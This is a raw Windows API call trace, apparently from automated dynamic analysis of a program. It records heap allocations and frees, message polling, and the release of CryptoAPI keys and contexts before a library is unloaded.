RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0244.711] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.711] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0244.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0244.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0244.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0244.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0244.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0244.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0244.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0244.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0244.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e510a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0244.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0244.712] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0244.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0244.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.712] CryptDestroyKey (hKey=0xa87290) returned 1 [0244.712] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0244.713] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0244.713] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0244.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0244.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.713] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0244.713] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0244.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56060 | out: hHeap=0x970000) returned 1 [0244.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.713] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0244.713] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0244.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0244.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0244.755] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0244.755] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0244.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.756] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0244.756] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0244.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0244.756] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0244.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0244.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0244.756] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0244.756] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0244.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.757] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0244.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0244.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.757] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.757] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0244.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56028 | out: hHeap=0x970000) returned 1 [0244.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.757] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0244.757] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0244.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0244.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0244.757] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.758] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0244.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0244.758] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0244.758] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.758] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55bc8 | out: hHeap=0x970000) returned 1 [0244.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0244.758] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0244.758] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0244.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0244.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.759] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0244.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0244.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0244.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0244.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0244.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0244.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0244.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0244.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0244.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0244.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0244.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0244.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0244.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0244.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0244.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0244.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0244.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0244.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0244.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0244.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0244.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0244.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0244.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0244.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0244.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0244.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0244.761] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0244.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0244.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0244.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.761] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0244.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0244.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0244.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0244.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0244.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0244.763] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0244.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0244.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ed8 [0244.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0244.763] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ed8 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0244.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0244.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0244.763] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0244.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0244.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0244.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0244.764] FreeLibrary (hLibModule=0x756e0000) returned 1 [0244.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0244.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0244.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0244.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0244.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0244.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0244.764] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0244.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0244.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0244.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0244.764] RtlAllocateHeap (HeapHandle=0x970000, 